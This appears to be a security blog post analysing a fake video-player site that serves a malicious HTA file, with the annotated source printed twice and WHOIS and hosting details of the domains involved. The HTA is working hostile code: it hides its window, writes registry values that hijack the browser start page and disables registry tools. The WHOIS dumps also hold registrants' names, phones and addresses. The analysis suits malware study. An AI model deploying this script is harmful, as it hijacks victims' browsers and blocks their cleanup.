This site offers its victims the usual player you're used to seeing on the likes of YouTube - with a major difference. Instead of a fake codec or an actual video, an HTA is downloaded and executed, which contains:
<html><head>
<!-- HTA manifest: no taskbar entry, no caption, no border, no scrollbars, no
     context menu. Together with the 0x0 resize below, the victim never sees
     a window while the scripts run. -->
<hta:application id=hta_note_id
applicationName=hta_note_name
showInTaskBar=no
caption=no
innerBorder=no
selection=no
scroll=no
contextmenu=no />
<script language=javascript>
// Shrink the HTA window to nothing and park it at the top-left corner.
window.resizeTo(0, 0);
window.moveTo(0, 0);
</script>
<SCRIPT language=vbs>
' Payload. An HTA runs its script with the privileges of the user who
' launched it, not in the browser sandbox, so WScript.Shell.RegWrite works.
' Every write below is a browser-settings hijack towards search.asgunyapi.com,
' followed by policy values that make the change hard to undo.
' Detection: registry writes to the six keys below originating from
' mshta.exe. The HKLM writes normally need administrative rights, so which
' keys actually changed on a host tells you the privilege level it ran at.
self.MoveTo 0, 0
Set shell = CreateObject("WScript.Shell")
' URL\Prefixes entry named "mirc" whose value is the hijack domain.
' NOTE(review): the "\\" before each value name is reproduced as captured.
shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\mirc","http://search.asgunyapi.com","REG_SZ"
' Policy values under Control Panel\HomePage = 1, machine-wide and for the
' current user. The key name indicates this locks the home-page setting
' against change through the Internet Options UI.
shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
' IE start page for the current user and the machine default.
shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://search.asgunyapi.com","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://search.asgunyapi.com","REG_SZ"
' Policy: DisableRegistryTools = 1 for the current user, blocking regedit and
' so hindering manual cleanup of the values just written.
shell.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\\DisableRegistryTools","00000001","REG_DWORD"
' Unloading the document is what fires the body's onbeforeunload handler
' further down, so the hidden HTA exits by opening a visible popup.
self.Close
</SCRIPT>
<script language="JavaScript">
<!--
// Looks like the stock FrontPage "open new window" helper (FP_ prefix, v1.0
// tag). Builds a window.open() feature string from the boolean flags
// (nav=toolbar, loc=location, sts=status, menu=menubar, scroll=scrollbars,
// resize=resizable), appends width/height when non-empty, strips a trailing
// comma, then opens url in a window named name. No return value.
function FP_openNewWindow(w,h,nav,loc,sts,menu,scroll,resize,name,url) {//v1.0
var windowProperties=''; if(nav==false) windowProperties+='toolbar=no,'; else
windowProperties+='toolbar=yes,'; if(loc==false) windowProperties+='location=no,';
else windowProperties+='location=yes,'; if(sts==false) windowProperties+='status=no,';
else windowProperties+='status=yes,'; if(menu==false) windowProperties+='menubar=no,';
else windowProperties+='menubar=yes,'; if(scroll==false) windowProperties+='scrollbars=no,';
else windowProperties+='scrollbars=yes,'; if(resize==false) windowProperties+='resizable=no,';
else windowProperties+='resizable=yes,'; if(w!="") windowProperties+='width='+w+',';
if(h!="") windowProperties+='height='+h; if(windowProperties!="") {
if( windowProperties.charAt(windowProperties.length-1)==',')
windowProperties=windowProperties.substring(0,windowProperties.length-1); }
window.open(url,name,windowProperties);
}
// -->
</script>
</head>
<!-- Fired by self.Close above: opens a 1024x768 window named "Duyuru"
     (Turkish: "announcement") on the hijack domain, scrollbars on and all
     other chrome off. The body itself is empty; the HTA has no visible UI. -->
<body onbeforeunload="FP_openNewWindow('1024', '768', false, false, false, false, true, false, 'Duyuru', /*href*/'http://search.asgunyapi.com')">
</body>
<!-- This block repeats the HTA listing above verbatim (minus the opening
     html/head tags). Annotated the same way so it reads on its own. -->
<!-- HTA manifest: no taskbar entry, no caption, no border, no scrollbars, no
     context menu. Together with the 0x0 resize below, the victim never sees
     a window while the scripts run. -->
<hta:application id=hta_note_id
applicationName=hta_note_name
showInTaskBar=no
caption=no
innerBorder=no
selection=no
scroll=no
contextmenu=no />
<script language=javascript>
// Shrink the HTA window to nothing and park it at the top-left corner.
window.resizeTo(0, 0);
window.moveTo(0, 0);
</script>
<SCRIPT language=vbs>
' Payload. An HTA runs its script with the privileges of the user who
' launched it, not in the browser sandbox, so WScript.Shell.RegWrite works.
' Every write below is a browser-settings hijack towards search.asgunyapi.com,
' followed by policy values that make the change hard to undo.
' Detection: registry writes to the six keys below originating from
' mshta.exe. The HKLM writes normally need administrative rights, so which
' keys actually changed on a host tells you the privilege level it ran at.
self.MoveTo 0, 0
Set shell = CreateObject("WScript.Shell")
' URL\Prefixes entry named "mirc" whose value is the hijack domain.
' NOTE(review): the "\\" before each value name is reproduced as captured.
shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\mirc","http://search.asgunyapi.com","REG_SZ"
' Policy values under Control Panel\HomePage = 1, machine-wide and for the
' current user. The key name indicates this locks the home-page setting
' against change through the Internet Options UI.
shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
' IE start page for the current user and the machine default.
shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://search.asgunyapi.com","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://search.asgunyapi.com","REG_SZ"
' Policy: DisableRegistryTools = 1 for the current user, blocking regedit and
' so hindering manual cleanup of the values just written.
shell.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\\DisableRegistryTools","00000001","REG_DWORD"
' Unloading the document is what fires the body's onbeforeunload handler
' further down, so the hidden HTA exits by opening a visible popup.
self.Close
</SCRIPT>
<script language="JavaScript">
<!--
// Looks like the stock FrontPage "open new window" helper (FP_ prefix, v1.0
// tag). Builds a window.open() feature string from the boolean flags
// (nav=toolbar, loc=location, sts=status, menu=menubar, scroll=scrollbars,
// resize=resizable), appends width/height when non-empty, strips a trailing
// comma, then opens url in a window named name. No return value.
function FP_openNewWindow(w,h,nav,loc,sts,menu,scroll,resize,name,url) {//v1.0
var windowProperties=''; if(nav==false) windowProperties+='toolbar=no,'; else
windowProperties+='toolbar=yes,'; if(loc==false) windowProperties+='location=no,';
else windowProperties+='location=yes,'; if(sts==false) windowProperties+='status=no,';
else windowProperties+='status=yes,'; if(menu==false) windowProperties+='menubar=no,';
else windowProperties+='menubar=yes,'; if(scroll==false) windowProperties+='scrollbars=no,';
else windowProperties+='scrollbars=yes,'; if(resize==false) windowProperties+='resizable=no,';
else windowProperties+='resizable=yes,'; if(w!="") windowProperties+='width='+w+',';
if(h!="") windowProperties+='height='+h; if(windowProperties!="") {
if( windowProperties.charAt(windowProperties.length-1)==',')
windowProperties=windowProperties.substring(0,windowProperties.length-1); }
window.open(url,name,windowProperties);
}
// -->
</script>
</head>
<!-- Fired by self.Close above: opens a 1024x768 window named "Duyuru"
     (Turkish: "announcement") on the hijack domain, scrollbars on and all
     other chrome off. The body itself is empty; the HTA has no visible UI. -->
<body onbeforeunload="FP_openNewWindow('1024', '768', false, false, false, false, true, false, 'Duyuru', /*href*/'http://search.asgunyapi.com')">
</body>
You'll have noticed the hijacks to search.asgunyapi.com. This chap is hosted by HostGator (I've already fired off an abuse report), and should hopefully be down soon:
Host: search.asgunyapi.com
Current IP: 74.54.218.98
IP PTR: gator441.hostgator.com
ASN: 21844 74.52.0.0/14 THEPLANET-AS - ThePlanet.com Internet Services, Inc.
Registration Service Provided By: REG2C
Contact: +90.2242248640
Website: http://www.reg2c.com
Domain Name: ASGUNYAPI.COM
Registrant:
lider
halil -(279214) (strom_@msn.com)
istanbul
istanbul
,34100
TR
Tel. +90.05374067878
Fax. +90.02126179416
Creation Date: 22-Mar-2010
Expiration Date: 22-Mar-2011
Domain servers in listed order:
ns882.hostgator.com
ns881.hostgator.com
Administrative Contact:
lider
halil -(279214) (strom_@msn.com)
istanbul
istanbul
,34100
TR
Tel. +90.05374067878
Fax. +90.02126179416
Technical Contact:
lider
halil -(279214) (strom_@msn.com)
istanbul
istanbul
,34100
TR
Tel. +90.05374067878
Fax. +90.02126179416
Billing Contact:
lider
halil -(279214) (strom_@msn.com)
istanbul
istanbul
,34100
TR
Tel. +90.05374067878
Fax. +90.02126179416
Status:LOCKED
Contact: +90.2242248640
Website: http://www.reg2c.com
Domain Name: ASGUNYAPI.COM
Registrant:
lider
halil -(279214) (strom_@msn.com)
istanbul
istanbul
,34100
TR
Tel. +90.05374067878
Fax. +90.02126179416
Creation Date: 22-Mar-2010
Expiration Date: 22-Mar-2011
Domain servers in listed order:
ns882.hostgator.com
ns881.hostgator.com
Administrative Contact:
lider
halil -(279214) (strom_@msn.com)
istanbul
istanbul
,34100
TR
Tel. +90.05374067878
Fax. +90.02126179416
Technical Contact:
lider
halil -(279214) (strom_@msn.com)
istanbul
istanbul
,34100
TR
Tel. +90.05374067878
Fax. +90.02126179416
Billing Contact:
lider
halil -(279214) (strom_@msn.com)
istanbul
istanbul
,34100
TR
Tel. +90.05374067878
Fax. +90.02126179416
Status:LOCKED
The best part, however, is the delivery site itself - this little chap is hosted by the infamously crimeware-friendly RapidSwitch. RapidSwitch is an ISP with a history of housing everything from warez to phishing to malware. Incidentally, I recently fired off an abuse report to RapidSwitch, and was rather surprised to find they'd finally gone ahead with their promise of blocking me from e-mailing them (better late than never, I suppose - they said they were doing so 2 years ago - but a little hint, RapidSwitch: it's not the best way of convincing someone to unblacklist you).
Host: kalitepornolar.org
Current IP: 95.154.242.200
IP PTR: Resolution failed
ASN: 29131 95.154.192.0/18 RAPIDSWITCH-AS RapidSwitch
Domain ID:D160877627-LROR
Domain Name:KALITEPORNOLAR.ORG
Created On:09-Dec-2010 08:57:49 UTC
Last Updated On:09-Dec-2010 13:51:59 UTC
Expiration Date:09-Dec-2011 08:57:49 UTC
Sponsoring Registrar:GoDaddy.com, Inc. (R91-LROR)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:CR69417596
Registrant Name:okan delikaya
Registrant Street1:arn. merk mah eyupsultan cad
Registrant Street2:arnavutkoy
Registrant Street3:
Registrant City:istanbul
Registrant State/Province:arnavutkoy
Registrant Postal Code:34275
Registrant Country:TR
Registrant Phone:+90.05302731122
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email: okan@kriptex.com
Admin ID:CR69417598
Admin Name:okan delikaya
Admin Street1:arn. merk mah eyupsultan cad
Admin Street2:arnavutkoy
Admin Street3:
Admin City:istanbul
Admin State/Province:arnavutkoy
Admin Postal Code:34275
Admin Country:TR
Admin Phone:+90.05302731122
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email: okan@kriptex.com
Tech ID:CR69417597
Tech Name:okan delikaya
Tech Street1:arn. merk mah eyupsultan cad
Tech Street2:arnavutkoy
Tech Street3:
Tech City:istanbul
Tech State/Province:arnavutkoy
Tech Postal Code:34275
Tech Country:TR
Tech Phone:+90.05302731122
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email: okan@kriptex.com
Name Server:NS2.KALITELIPORNOLAR.ORG
Name Server:NS1.KALITELIPORNOLAR.ORG
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC:Unsigned
Domain Name:KALITEPORNOLAR.ORG
Created On:09-Dec-2010 08:57:49 UTC
Last Updated On:09-Dec-2010 13:51:59 UTC
Expiration Date:09-Dec-2011 08:57:49 UTC
Sponsoring Registrar:GoDaddy.com, Inc. (R91-LROR)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:CR69417596
Registrant Name:okan delikaya
Registrant Street1:arn. merk mah eyupsultan cad
Registrant Street2:arnavutkoy
Registrant Street3:
Registrant City:istanbul
Registrant State/Province:arnavutkoy
Registrant Postal Code:34275
Registrant Country:TR
Registrant Phone:+90.05302731122
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email: okan@kriptex.com
Admin ID:CR69417598
Admin Name:okan delikaya
Admin Street1:arn. merk mah eyupsultan cad
Admin Street2:arnavutkoy
Admin Street3:
Admin City:istanbul
Admin State/Province:arnavutkoy
Admin Postal Code:34275
Admin Country:TR
Admin Phone:+90.05302731122
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email: okan@kriptex.com
Tech ID:CR69417597
Tech Name:okan delikaya
Tech Street1:arn. merk mah eyupsultan cad
Tech Street2:arnavutkoy
Tech Street3:
Tech City:istanbul
Tech State/Province:arnavutkoy
Tech Postal Code:34275
Tech Country:TR
Tech Phone:+90.05302731122
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email: okan@kriptex.com
Name Server:NS2.KALITELIPORNOLAR.ORG
Name Server:NS1.KALITELIPORNOLAR.ORG
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC:Unsigned
One of the many sites leading to these fake movie sites is turkpornoizle.tk, which should be down shortly.
Host: turkpornoizle.tk
Current IP: 212.7.200.223
IP PTR: Resolution failed
ASN: 16265 212.7.192.0/19 LEASEWEB LEASEWEB AS